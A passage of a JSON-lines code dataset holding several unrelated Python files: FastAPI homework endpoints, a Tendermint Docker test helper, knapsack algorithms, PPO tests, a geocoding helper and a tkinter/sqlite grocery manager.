found\")\n\n#API 7: GET /api/v1/hello?name=pradeep -> use query params\n# READ THE DOCS: https://fastapi.tiangolo.com/tutorial/query-params/\n@app.get(\"/api/v1/hello\")\n# use this URL to test: http://127.0.0.1:8000/api/v1/hello/?name=pradeep\nasync def QueryPass(name: str = \"World\"): # World is the default if no query param is passed\n return{\"greeting\":\"Hello \"+name+\"!\"}\n\n\n# END HOMEWORK APIs 5 6 7 -----------------------------------------------------------------------\n#\n#\n#\n\n# START PRADEEP LESSON - SIMPLE APIs -----------------------------------------------------------\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Running LessonAPI/main.py, just the slash\"}\n\n# API 1: GET /api/v1/ping -> return a pre-defined string\n@app.get(\"/api/v1/ping\")\nasync def ping():\n return {\"message from ping\": \"pong\"}\n# END PRADEEP LESSON - SIMPLE APIs ------------------------------------------------------------\n\n\n# START HOMEWORK -------------------------------------------------------------------------------\n\n''' START REFERENCE URLS -------------------------\nhttps://www.notion.so/Api-Exercise-8c8c0119b01642c1a8b35e9f5bfecf8c -> HW assignment\nhttps://fastapi.tiangolo.com/tutorial/path-params/ -> FastAPI Path Parameters\n--- END REFERENCE URLS --------------------------- \n'''\n\n# API 2: GET /api/v1/greeting -> return a pre-defined key-value pair\n@app.get(\"/api/v1/greeting\")\nasync def greeting():\n return {\"greeting\": \"Hello API 2\"}\n\n# API 3: GET /api/v1/greeting/pradeep -> input a path parameter and return a key-value pair using the parameter\n@app.get(\"/api/v1/greeting/{pradeep}\") # remember the brackets for a parameter\nasync def Var_Name(pradeep):\n return {\"greeting\": \"Hello API 3, this is \"+pradeep}\n\n# API 4: GET /api/v1/sum/1/1 --> input (2) path parameters, and them, and return the sum\n'''first try -- did not work because V1,V2 are strings, so operator + executed a \"concatenate\"\n@app.get(\"/api/v1/sum/{V1}/{V2}\")\nasync def sum(V1,V2):\n BIF = V1 + V2\n VAR1 = V1\n VAR2 = V2\n VAR3= sum\n print (VAR3)\n return {\"sum\":VAR3}\n'''\n# second try -- Q: did I need to force the int on the parameters in the method, or just the formula?\n@app.get(\"/api/v1/sum1/{V1}/{V2}\") # /sum1 forces parameters in 2 places - THIS WORKS\nasync def sum(V1: int,V2: int):\n VAR1=int(V1)\n VAR2=int(V2)\n # VAR3= sum --> remove this. sum is a method above, we can't refer to a method from inside the method\n # print (VAR3)\n BIF=VAR1+VAR2\n print(BIF)\n return {\"Double forcing\":BIF}\n\n# second try continued -- several iterations to test ways to do the forcing\n@app.get(\"/api/v1/sum2/{V1}/{V2}\") # /sum2 no forcing is used - DOES NOT WORK, it concatenates V1 and V2\nasync def sum(V1,V2):\n VAR1=V1\n VAR2=V2\n BIF=VAR1+VAR2\n print(BIF)\n return {\"NO forcing\":BIF}\n\n@app.get(\"/api/v1/sum3/{V1}/{V2}\") # /sum3 forces parameters in the method definition only - THIS WORKS\nasync def sum(V1: int,V2: int):\n VAR1=V1\n VAR2=V2\n BIF=VAR1+VAR2\n print(BIF)\n return {\"Forcing in the method\":BIF}\n\n@app.get(\"/api/v1/sum4/{V1}/{V2}\") # /sum4 forces parameters in the VAR definitions only - THIS WORKS\nasync def sum(V1,V2):\n VAR1=int(V1)\n VAR2=int(V2)\n BIF=VAR1+VAR2\n print(BIF)\n return {\"forcing at the variables\":BIF}\n\n@app.get(\"/api/v1/sum5/{V1}/{V2}\") # /sum5 eliminates unnecessary variables, forces parameters in the formula - THIS WORKS\nasync def sum(V1,V2):\n BIF = int(V1) + int(V2)\n print(BIF)\n return {\"forcing in the forumula\":BIF}\n\n# END HOMEWORK ---------\n# -------------------------------------------------------------------------","repo_name":"bryanfinkel/LessonAPI","sub_path":"archive/main_v1.py","file_name":"main_v1.py","file_ext":"py","file_size_in_byte":6987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11938982265","text":"import os\n\nimport task3.add_pedestrian as modify_scenario\n\nif __name__ == \"__main__\":\n \"\"\"\n Automatic creation of Corridor Scenario needed for task 4.5\n It assumes that the corridor is of 40x20 with a target id of 2\n \"\"\"\n num_pedestrian_to_generate = 100\n scenario_to_modify = os.getcwd() + \"\\\\task4.5\\\\scenarios\\\\task4.5_2.scenario\"\n for i in range(num_pedestrian_to_generate):\n modify_scenario.add_pedestrian(\n id=num_pedestrian_to_generate + i,\n scenario_path=scenario_to_modify,\n out_scen_name=\"task4.5_2\",\n output_path=scenario_to_modify,\n position=(i // 20, i % 20), # to correctly position pedestrians starting from the left\n targetIds=[2],\n groupIds=[0] # infected\n )\n","repo_name":"AlexPasqua/MLCMS-exercises","sub_path":"EX2/task4/create_scenario_task4.5_2.py","file_name":"create_scenario_task4.5_2.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"24007018814","text":"import logging\nimport os\nimport subprocess # nosec\nimport time\nfrom pathlib import Path\nfrom typing import Any, Dict, List\n\nimport docker\nimport pytest\nfrom aea_test_autonomy.configurations import (\n TENDERMINT_IMAGE_NAME,\n TENDERMINT_IMAGE_VERSION,\n)\nfrom aea_test_autonomy.docker.base import DockerImage\nfrom aea_test_autonomy.helpers.base import tendermint_health_check\nfrom docker.models.containers import Container\n\n\n_TCP = \"tcp://\"\n_HTTP = \"http://\"\n_LOCAL_ADDRESS = \"0.0.0.0\" # nosec\n\nDEFAULT_TENDERMINT_PORT = 26657\nDEFAULT_P2P_PORT = 26656\nDEFAULT_TENDERMINT_COM_PORT = 8080\nDEFAULT_ABCI_PORT = 26658\n# we need this because we want to connect from the Tendermint\n# Docker container to the ABCI server that lives in the host\nDEFAULT_ABCI_HOST = \"host.docker.internal\"\n\n_SLEEP_TIME = 1\n\n\nclass TendermintDockerImage(DockerImage):\n \"\"\"Tendermint Docker image.\"\"\"\n\n use_grpc: bool = False\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n client: docker.DockerClient,\n abci_host: str = DEFAULT_ABCI_HOST,\n abci_port: int = DEFAULT_ABCI_PORT,\n port: int = DEFAULT_TENDERMINT_PORT,\n p2p_port: int = DEFAULT_P2P_PORT,\n com_port: int = DEFAULT_TENDERMINT_COM_PORT,\n ):\n \"\"\"Initialize.\"\"\"\n super().__init__(client)\n self.abci_host = abci_host\n self.abci_port = abci_port\n self.port = port\n self.p2p_port = p2p_port\n self.com_port = com_port\n self.proxy_app = f\"{_TCP}{self.abci_host}:{self.abci_port}\"\n\n @property\n def image(self) -> str:\n \"\"\"Get the image name.\"\"\"\n return \"tendermint/tendermint:v0.34.19\"\n\n def _build_command(self) -> List[str]:\n \"\"\"Build command.\"\"\"\n\n abci = \"grpc\" if self.use_grpc else \"socket\"\n cmd = [\"node\", f\"--abci={abci}\", f\"--proxy_app={self.proxy_app}\"]\n logging.info(f\"TendermintDockerImage: {cmd}\")\n\n return cmd\n\n def create(self) -> Container:\n \"\"\"Create the container.\"\"\"\n cmd = self._build_command()\n if self.abci_host == DEFAULT_ABCI_HOST:\n extra_hosts_config = {self.abci_host: \"host-gateway\"}\n else:\n extra_hosts_config = {}\n container = self._client.containers.run(\n self.image,\n command=cmd,\n detach=True,\n network=\"host\",\n extra_hosts=extra_hosts_config,\n )\n return container\n\n def create_many(self, nb_containers: int) -> List[Container]:\n \"\"\"Instantiate the image in many containers, parametrized.\"\"\"\n raise NotImplementedError()\n\n def wait(self, max_attempts: int = 15, sleep_rate: float = 1.0) -> bool:\n \"\"\"\n Wait until the image is running.\n\n :param max_attempts: max number of attempts.\n :param sleep_rate: the amount of time to sleep between different requests.\n :return: True if the wait was successful, False otherwise.\n \"\"\"\n time.sleep(_SLEEP_TIME)\n return True\n\n\nclass FlaskTendermintDockerImage(TendermintDockerImage):\n \"\"\"Flask app with Tendermint Docker image.\"\"\"\n\n _extra_hosts: Dict[str, str]\n\n def __init__( # pylint: disable=too-many-arguments,useless-super-delegation\n self,\n client: docker.DockerClient,\n abci_host: str = DEFAULT_ABCI_HOST,\n abci_port: int = DEFAULT_ABCI_PORT,\n port: int = DEFAULT_TENDERMINT_PORT,\n p2p_port: int = DEFAULT_P2P_PORT,\n com_port: int = DEFAULT_TENDERMINT_COM_PORT + 2,\n ):\n \"\"\"Initialize.\"\"\"\n super().__init__(client, abci_host, abci_port, port, p2p_port, com_port)\n\n @property\n def image(self) -> str:\n \"\"\"Get the image name.\"\"\"\n return f\"{TENDERMINT_IMAGE_NAME}:{TENDERMINT_IMAGE_VERSION}\"\n\n @staticmethod\n def get_node_name(i: int) -> str:\n \"\"\"Get the ith node's name.\"\"\"\n return f\"node{i}\"\n\n def _get_node_id(self, i: int) -> str:\n \"\"\"Get the node id.\"\"\"\n cmd = [\n \"docker\",\n \"exec\",\n self.get_node_name(i),\n \"tendermint\",\n \"--home\",\n self.get_node_name(i),\n \"show-node-id\",\n ]\n process = subprocess.Popen( # nosec # pylint: disable=consider-using-with\n cmd,\n stdout=subprocess.PIPE,\n )\n output, _ = process.communicate()\n node_id = output.decode().strip()\n return node_id\n\n @staticmethod\n def __increment_port(port: int, i: int) -> int:\n \"\"\"Increment a port\"\"\"\n return port + i * 10\n\n def get_port(self, i: int) -> int:\n \"\"\"Get the ith port.\"\"\"\n return self.__increment_port(self.port, i)\n\n def get_com_port(self, i: int) -> int:\n \"\"\"Get the ith com port.\"\"\"\n return self.__increment_port(self.com_port, i)\n\n def get_p2p_port(self, i: int) -> int:\n \"\"\"Get the ith p2p port.\"\"\"\n return self.__increment_port(self.p2p_port, i)\n\n def get_abci_port(self, i: int) -> int:\n \"\"\"Get the ith abci port.\"\"\"\n return self.__increment_port(self.abci_port, i)\n\n def get_addr(self, prefix: str, i: int, p2p: bool = False) -> str:\n \"\"\"Get a node's address.\"\"\"\n valid_prefixes = {_TCP, _HTTP}\n if prefix not in valid_prefixes:\n raise ValueError(f\"Invalid prefix! Should be one of: {valid_prefixes}\")\n\n if p2p:\n prefix += self._get_node_id(i) + \"@\"\n port = self.get_p2p_port(i)\n else:\n port = self.get_port(i)\n\n return f\"{prefix}{_LOCAL_ADDRESS}:{port}\"\n\n @property\n def p2p_seeds(self) -> List[str]:\n \"\"\"Get p2p seeds.\"\"\"\n if self.nb_nodes is None:\n raise ValueError(\"Trying to get p2p seeds before initializing containers!\")\n\n return [self.get_addr(_TCP, i) for i in range(self.nb_nodes)]\n\n def _build_command(self) -> List[str]:\n \"\"\"Build command.\"\"\"\n return [\"run\", \"--no-reload\", f\"--host={_LOCAL_ADDRESS}\", \"--port=8080\"]\n\n def _create_one(self, i: int) -> Container:\n \"\"\"Create a node container.\"\"\"\n\n name = self.get_node_name(i)\n extra_hosts = (\n {self.abci_host: \"host-gateway\"}\n if self.abci_host == DEFAULT_ABCI_HOST\n else {}\n )\n extra_hosts.update(self._extra_hosts)\n\n proxy_app = f\"{_TCP}{self.abci_host}:{self.get_abci_port(i)}\"\n\n run_kwargs = dict(\n image=self.image,\n command=self._build_command(),\n name=name,\n hostname=name,\n detach=True,\n mem_limit=\"1024m\",\n mem_reservation=\"256M\",\n environment={\n \"ID\": i,\n \"PROXY_APP\": proxy_app,\n \"TMHOME\": f\"/tendermint/{name}\",\n \"CREATE_EMPTY_BLOCKS\": \"true\",\n \"DEV_MODE\": \"1\",\n \"LOG_FILE\": f\"/logs/{name}.txt\",\n \"USE_GRPC\": (\"false\", \"true\")[self.use_grpc],\n },\n working_dir=\"/tendermint\",\n volumes=[\n f\"{os.getcwd()}/nodes:/tendermint:Z\",\n f\"{os.getcwd()}/logs:/logs:Z\",\n f\"{os.getcwd()}/tm_state:/tm_state:Z\",\n ],\n ports={\n f\"{DEFAULT_TENDERMINT_PORT}/tcp\": (\n _LOCAL_ADDRESS, # nosec,\n self.get_port(i),\n ),\n f\"{DEFAULT_TENDERMINT_COM_PORT}/tcp\": (\n _LOCAL_ADDRESS, # nosec,\n self.get_com_port(i),\n ),\n f\"{DEFAULT_P2P_PORT}/tcp\": (\n _LOCAL_ADDRESS, # nosec,\n self.get_p2p_port(i),\n ),\n },\n extra_hosts=extra_hosts,\n )\n container = self._client.containers.run(**run_kwargs)\n return container\n\n def _fix_persistent_peers(self) -> None: # pylint: disable=too-many-locals\n \"\"\"\n Fix the persistent peers' ports in the configuration file.\n\n Since we are running all the ABCIs at the same host for our e2e tests, we shift the ports by 10 for each\n added node. Therefore, we need to override the default persistent peers in the config files,\n in order for them to use the correct ports.\n \"\"\"\n replace_cmd = \"\"\n for node_num in range(self.nb_nodes):\n preconfigured_endpoint = f\"node{node_num}:{DEFAULT_P2P_PORT}\"\n correct_endpoint = f\"node{node_num}:{self.get_p2p_port(node_num)}\"\n if replace_cmd != \"\":\n replace_cmd += \" && \"\n replace_cmd += f\"sed -i 's/{preconfigured_endpoint}/{correct_endpoint}/g' /tendermint/node*/config/config.toml\"\n cmd = [\n \"docker\",\n \"run\",\n \"--rm\",\n \"-v\",\n f\"{os.getcwd()}/nodes:/tendermint:Z\",\n \"--entrypoint=/bin/bash\",\n self.image,\n \"-c\",\n replace_cmd,\n ]\n subprocess.run(cmd) # nosec # pylint: disable=subprocess-run-check\n\n def _grant_permissions(self) -> None:\n \"\"\"\n Grant permissions for the nodes' config files.\n\n Create the nodes' config files, so that the `testnet` command which is run via docker\n does not create it with root permissions, so we can later modify the `config.toml` files.\n \"\"\"\n for i in range(self.nb_nodes):\n path = Path(f\"{os.getcwd()}\", \"nodes\", f\"node{i}\", \"config\")\n os.makedirs(path)\n open( # pylint: disable=consider-using-with,unspecified-encoding\n path / \"config.toml\", \"a\"\n ).close()\n\n def _create_testnet(self) -> None:\n \"\"\"Create the Tendermint testnet.\"\"\"\n cmd = [\n \"docker\",\n \"run\",\n \"--rm\",\n \"-v\",\n f\"{os.getcwd()}/nodes:/tendermint:Z\",\n \"--entrypoint=/usr/bin/tendermint\",\n self.image,\n \"testnet\",\n \"--config\",\n \"/etc/tendermint/config-template.toml\",\n \"--v\",\n f\"{self.nb_nodes}\",\n \"--o\",\n \"/tendermint/\",\n ]\n for i in range(self.nb_nodes):\n cmd.append(f\"--hostname=node{i}\")\n\n subprocess.run(cmd) # nosec # pylint: disable=subprocess-run-check\n\n def _create_config(self, nb_nodes: int) -> None:\n \"\"\"Create necessary configuration.\"\"\"\n self.nb_nodes = nb_nodes # pylint: disable=attribute-defined-outside-init\n self._grant_permissions()\n self._create_testnet()\n self._fix_persistent_peers()\n self._extra_hosts = {\n self.get_node_name(i): \"host-gateway\" for i in range(nb_nodes)\n }\n\n def create_many(self, nb_containers: int) -> List[Container]:\n \"\"\"Create a list of node containers.\"\"\"\n self._create_config(nb_containers)\n containers = [self._create_one(i) for i in range(nb_containers)]\n return containers\n\n def health_check(self, **kwargs: Any) -> None:\n \"\"\"Do a health-check of the Tendermint network.\"\"\"\n http_rpc_laddresses = [self.get_addr(_HTTP, i) for i in range(self.nb_nodes)]\n for http_rpc_laddr in http_rpc_laddresses:\n if not tendermint_health_check(http_rpc_laddr, **kwargs):\n pytest.fail(\n f\"Tendermint node {http_rpc_laddr} did not pass health-check\"\n )\n\n @staticmethod\n def cleanup(nb_containers: int) -> None:\n \"\"\"Cleanup dangling containers.\"\"\"\n cmd = [\n \"docker\",\n \"rm\",\n ]\n for i in range(nb_containers):\n cmd.append(FlaskTendermintDockerImage.get_node_name(i))\n\n # this will get rid of the containers even if they are healthy\n cmd.append(\"--force\")\n subprocess.run(cmd) # nosec # pylint: disable=subprocess-run-check\n","repo_name":"valory-xyz/open-autonomy","sub_path":"plugins/aea-test-autonomy/aea_test_autonomy/docker/tendermint.py","file_name":"tendermint.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"39"} +{"seq_id":"6739769001","text":"from typing import *\n\n# Versión recursiva directa\nfrom Utils.bt_scheme import infinity\n\n\ndef mochila_rec(v: List[int], w: List[int], W: int) -> int:\n def B(n: int, c: int) -> int:\n if n == 0:\n return 0\n if w[n - 1] <= c:\n return max(B(n - 1, c), B(n - 1, c - w[n - 1]) + v[n - 1])\n else:\n return B(n - 1, c)\n\n N = len(v)\n return B(N, W)\n\n\n# Versión recursiva con memoización\ndef mochila_rec_mem(v: List[int], w: List[int], W: int) -> int:\n def B(n: int, c: int) -> int:\n if n == 0:\n return 0\n if (n, c) not in mem:\n if w[n - 1] <= c:\n mem[n, c] = max(B(n - 1, c), B(n - 1, c - w[n - 1]) + v[n - 1])\n else:\n mem[n, c] = B(n - 1, c)\n\n return mem[n, c]\n\n N = len(v)\n mem = {}\n return B(N, W)\n\n\n# Versión recursiva con memorización y recuperación de camino\ndef mochila_rec_mem_camino(v: List[int], w: List[int], W: int) -> Tuple[int, List[int]]:\n def B(n: int, c: int) -> int:\n if n == 0:\n return 0\n if (n, c) not in mem:\n if w[n - 1] <= c:\n mem[n, c] = max((B(n - 1, c), (n - 1, c, 0)),\n (B(n - 1, c - w[n - 1]) + v[n - 1], (n - 1, c - w[n - 1], 1)))\n else:\n mem[n, c] = B(n - 1, c), (n - 1, c, 0)\n return mem[n, c][0]\n\n N = len(v)\n mem = {}\n score = B(N, W)\n sol = []\n n, q = N, W\n while n != 0:\n _, (nPrev, qPrev, i) = mem[n, q]\n sol.append(i)\n q, n = qPrev, nPrev\n sol.reverse()\n return score, sol\n\n\n# Versión iterativa con recuperación de camino\ndef mochila_iter_camino(v: List[int], w: List[int], W: int) -> Tuple[int, List[int]]:\n mem = {}\n N = len(v) # número de objetos\n\n for c in range(W + 1):\n mem[0, c] = 0, []\n\n for n in range(1, N + 1):\n for c in range(W + 1):\n if w[n - 1] <= c:\n mem[n, c] = max((mem[n - 1, c][0], (n - 1, c, 0)),\n (mem[n - 1, c - w[n - 1]][0] + v[n - 1], (n - 1, c - w[n - 1], 1)))\n else:\n mem[n, c] = mem[n - 1, c][0], (n - 1, c, 0)\n\n score = mem[N, W][0]\n sol = []\n\n while n != 0:\n _, (nPrev, cPrev, i) = mem[n, c]\n sol.append(i)\n n, c = nPrev, cPrev\n sol.reverse()\n return score, sol\n\n\n# Versión iterativa con reduccion del coste espacial\n\ndef mochila_iter_reduccion_coste(v: List[int], w: List[int], W: int) -> int:\n N = len(v) # número de objetos\n current = [0] * (W + 1)\n previous = [0] * (W + 1)\n for n in range(1, N + 1):\n previous, current = current, previous\n for c in range(W + 1):\n if w[n - 1] <= c:\n current[c] = max(previous[c],\n previous[c - w[n - 1]] + v[n - 1])\n else:\n current[c] = previous[c]\n\n return current[W]\n\n\n# PROGRAMA PRINCIPAL -------------------------------------------------------------------------\nif __name__ == \"__main__\":\n values = [90, 75, 60, 20, 10]\n weights = [4, 3, 3, 2, 2]\n capacity = 6\n\n print(\"Versión recursiva:\")\n print(mochila_rec(values, weights, capacity))\n print()\n print(\"Versión recursiva con memoización:\")\n print(mochila_rec_mem(values, weights, capacity))\n print()\n print(\"Versión recursiva con memoización y recuperación de camino:\")\n print(mochila_rec_mem_camino(values, weights, capacity))\n print()\n print(\"Versión iterativa con recuperación de camino:\")\n print(mochila_iter_camino(values, weights, capacity))\n print()\n print(\"Versión iterativa con reduccion del coste espacial:\")\n print(mochila_iter_reduccion_coste(values, weights, capacity))\n","repo_name":"Abensab/EI1022-Algoritmia","sub_path":"8_Session/sesion_8_mochila.py","file_name":"sesion_8_mochila.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"14413548081","text":"# %load q07_unusual_performances/build.py\n# default imports\nfrom greyatomlib.olympics_project_new.q02_country_operations.build import q02_country_operations, q01_rename_columns\npath = './data/olympics.csv'\nOlympicsDF=q01_rename_columns(path) \nOlympicsDF=q02_country_operations(OlympicsDF)\n\ndef q07_unusual_performances(OlympicsDF,low, high):\n \n \n df =OlympicsDF[:-1]\n #quant_df = df['Total'].quantile([low, high])\n df_low= df[low >= df['Total']]['Country_Name']\n df_high=df[high <= df['Total']]['Country_Name']\n return df_low,df_high\n\n\n\n\n\n\n","repo_name":"nemkothari/olympic_project_new","sub_path":"q07_unusual_performances/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"41922211692","text":"import pytest\n\nimport jax\nimport jax.numpy as jnp\nfrom .. import ppo_main\nimport envpool\n\n\n# parameterize the number of environments\n@pytest.mark.parametrize(\"num_envs\", [1, 2, 4])\ndef test_collect_trajectory_and_store_in_buffer(num_envs):\n train_config = ppo_main.TrainConfig(\n num_envs=num_envs,\n horizon=16\n )\n env = envpool.make(\n \"CartPole-v1\",\n env_type=\"gym\",\n num_envs=train_config.num_envs,\n )\n buffer = ppo_main.Buffer.create(\n horizon=train_config.horizon,\n num_envs=train_config.num_envs,\n observation_shape=(4,)\n )\n state = ppo_main.create_train_state(\n train_config, env.observation_space.shape, env.action_space.n)\n rng = jax.random.PRNGKey(train_config.model_seed)\n collected_buffer = ppo_main.collect_trajectory(\n state, buffer, env, rng, train_config)\n assert collected_buffer.obs.shape == (\n train_config.horizon + 1, train_config.num_envs, 4)\n # assert observations are non-zero and hence replaced\n assert not jnp.allclose(collected_buffer.obs, 0.0)\n\n\n@pytest.mark.parametrize(\"num_envs\", [1, 2, 4])\ndef test_agent_can_learn_from_experience(num_envs):\n train_config = ppo_main.TrainConfig(\n num_envs=num_envs,\n horizon=16\n )\n env = envpool.make(\n \"CartPole-v1\",\n env_type=\"gym\",\n num_envs=train_config.num_envs,\n )\n buffer = ppo_main.Buffer.create(\n horizon=train_config.horizon,\n num_envs=train_config.num_envs,\n observation_shape=(4,)\n )\n state = ppo_main.create_train_state(\n train_config, env.observation_space.shape, env.action_space.n)\n rng = jax.random.PRNGKey(train_config.model_seed)\n\n for _ in range(5):\n state, (loss, actor_loss, critic_loss, entropy_loss) = ppo_main.update_ppo_model(\n state, buffer, train_config, rng)\n\n assert loss < 0.5\n","repo_name":"Sruinard/deep_reinforcement_learning","sub_path":"ppo/tests/test_ppo_main.py","file_name":"test_ppo_main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13031991136","text":"import requests\n\nfrom config import APIKEY\nfrom exceptions import AddressError\n\n\ndef get_object_info(address: str) -> dict:\n geocoder_api_server = \"http://geocode-maps.yandex.ru/1.x/\"\n\n geocoder_params = {\n \"apikey\": APIKEY,\n \"geocode\": address,\n \"format\": \"json\"}\n\n response = requests.get(geocoder_api_server, params=geocoder_params)\n if not response:\n raise AddressError(\"Адрес не найден. Проверьте правильность написания\")\n try:\n return response.json()[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"]\n except IndexError:\n raise AddressError(\"Адрес не найден. Проверьте правильность написания\")\n\n\ndef get_object_coords_region(address: str) -> dict:\n item = get_object_info(address)\n longitude, latitude = item[\"Point\"][\"pos\"].split(\" \")\n try:\n region = item['metaDataProperty']['GeocoderMetaData']['Address']['Components'][2]['name']\n except IndexError:\n raise AddressError(\"Адрес не найден. Проверьте правильность написания\")\n return {\"longitude\": longitude, \"latitude\": latitude, \"region\": region}\n\n\ndef static_map_href(longitude, latitude):\n return f\"http://static-maps.yandex.ru/1.x/?l=map&{longitude},{latitude}&size=400,400&pt={longitude},{latitude},flag&spn=0.002,0.002\"\n","repo_name":"maklybae/MaKsenia","sub_path":"map_tools.py","file_name":"map_tools.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19572021353","text":"import tkinter as tk\r\nfrom tkinter import ttk, messagebox\r\nimport sqlite3\r\nfrom tkinter import *\r\n\r\nconn = sqlite3.connect(\"canteen.db\")\r\ncurr = conn.cursor()\r\ncurr.execute(\r\n 'create table if not exists Grocery(item_name text, quantity integer, price real, date text, total_price real)')\r\n\r\n\r\nclass Grocery(Toplevel):\r\n def __init__(self,username):\r\n Toplevel.__init__(self)\r\n self.title(\"CanMagS\")\r\n self.geometry(\"1200x700+0+0\")\r\n self.resizable(False, False)\r\n self.config(bg='mediumseagreen')\r\n self.count = 0\r\n tk.Label(self, text=\"CanMagS\", fg=\"blue\", bg='mediumseagreen',\r\n font=('Goudy Old Style', 80)).place(x=400, y=5)\r\n\r\n tk.Label(self, text=\"Item name\",\r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=200)\r\n Label(self, text=\"Quantity\",\r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=230)\r\n Label(self, text=\"Price\",\r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=260)\r\n Label(self, text=\"Date\", \r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=290)\r\n self.itn = StringVar()\r\n self.e1 = Entry(self, textvariable=self.itn)\r\n self.e1.place(x=160, y=205)\r\n self.q = StringVar()\r\n self.e2 = Entry(self, textvariable=self.q)\r\n self.e2.place(x=160, y=235)\r\n self.p = StringVar()\r\n self.e3 = Entry(self, textvariable=self.p)\r\n self.e3.place(x=160, y=265)\r\n self.d = StringVar()\r\n self.e4 = Entry(self, textvariable=self.d)\r\n self.e4.place(x=160, y=295)\r\n\r\n Button(self, text=\"Add\", command=self.Add,\r\n height=3, width=13).place(x=600, y=250)\r\n Button(self, text=\"View information\", command=self.view,\r\n height=3, width=13).place(x=710, y=250)\r\n Button(self, text=\"Update\", command=self.update,\r\n height=3, width=13).place(x=820, y=250)\r\n Button(self, text=\"Delete\", command=self.delete,\r\n height=3, width=13).place(x=930, y=250)\r\n \r\n\r\n cols = ('Item Name', 'Quantity', 'Price', 'Date', 'Total Price')\r\n self.listBox = ttk.Treeview(self, columns=cols, show='headings')\r\n\r\n for col in cols:\r\n self.listBox.heading(col, text=col)\r\n self.listBox.column(col, anchor=CENTER)\r\n self.listBox.grid(row=1, column=0, columnspan=2)\r\n self.listBox.place(x=30, y=350)\r\n\r\n self.listBox.bind('', self.GetValue)\r\n self.show()\r\n\r\n def GetValue(self, event):\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n row_id = self.listBox.selection()[0]\r\n select = self.listBox.set(row_id)\r\n self.e1.insert(0, select['item_name'])\r\n self.e2.insert(0, select['quantity'])\r\n self.e3.insert(0, select['price'])\r\n self.e4.insert(0, select['date'])\r\n\r\n \r\n def Add(self):\r\n item_name = self.e1.get()\r\n quantity = self.e2.get()\r\n price = self.e3.get()\r\n date = self.e4.get()\r\n self.tp = float(price) * float(quantity)\r\n try:\r\n curr.execute('insert into Grocery values(?,?,?,?,?)',\r\n (item_name, quantity, price, date, self.tp))\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n self.e1.focus_set()\r\n self.show()\r\n conn.commit()\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n def view(self):\r\n try:\r\n selected = self.listBox.focus()\r\n temp = self.listBox.item(selected, 'values')\r\n temp = list(temp)\r\n self.itn.set(temp[0])\r\n self.e1.config(state='disabled')\r\n self.q.set(temp[1])\r\n self.p.set(temp[2])\r\n self.d.set(temp[3])\r\n\r\n except Exception as e:\r\n\r\n print(e)\r\n\r\n def update(self):\r\n try:\r\n self.tp = float(self.e2.get()) * float(self.e3.get())\r\n curr.execute('update Grocery set quantity = ?, price = ?, date = ?, total_price = ? where item_name = ?',\r\n (self.e2.get(), self.e3.get(), self.e4.get(), self.tp, self.e1.get()))\r\n self.e1.config(state='normal')\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n self.e1.focus_set()\r\n self.show()\r\n conn.commit()\r\n\r\n except Exception as e:\r\n\r\n print(e)\r\n\r\n def delete(self):\r\n try:\r\n selected = self.listBox.focus()\r\n temp = self.listBox.item(selected, 'values')\r\n temp = list(temp)\r\n curr.execute('DELETE FROM Grocery WHERE item_name=?', (temp[0],))\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n self.e1.focus_set()\r\n conn.commit()\r\n for record in selected:\r\n self.listBox.delete(record)\r\n self.show()\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n def show(self):\r\n for i in self.listBox.get_children():\r\n self.listBox.delete(i)\r\n count = 1\r\n curr.execute(\"SELECT * from Grocery\")\r\n records = curr.fetchall()\r\n for record in records:\r\n self.listBox.insert(parent='', index='end', iid=count, text='', values=(\r\n record[0], record[1], record[2], record[3], record[4]))\r\n count += 1\r\n\r\n ","repo_name":"Shashank-Shetty/Python-Project","sub_path":"grocery.py","file_name":"grocery.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72143568434","text":"import os\nimport os.path as op\nimport glob\nimport cv2\nimport time\nimport numpy as np\nimport csv\n\nimport mmcv\nfrom mmcv.transforms import Compose\nfrom mmengine.utils import track_iter_progress\nfrom mmdet.registry import VISUALIZERS\nfrom mmdet.apis import init_detector, inference_detector\n\n\nclass SpeedLog:\n def __init__(self, ckpt_list, output, using_video=False):\n self.ckpt_list = ckpt_list\n if using_video:\n self.input_video = mmcv.VideoReader(\"../mmdetection/demo/demo.mp4\")\n self.frames = list(track_iter_progress(self.input_video))\n else:\n self.frames = self.load_frames()\n self.items = None\n self.test_pipeline = None\n self.models = self.build_model()\n self.logging_data(output=output, vis=False)\n\n def build_model(self):\n self.items = {glob.glob(op.join(config, \"*.py\"))[0]: 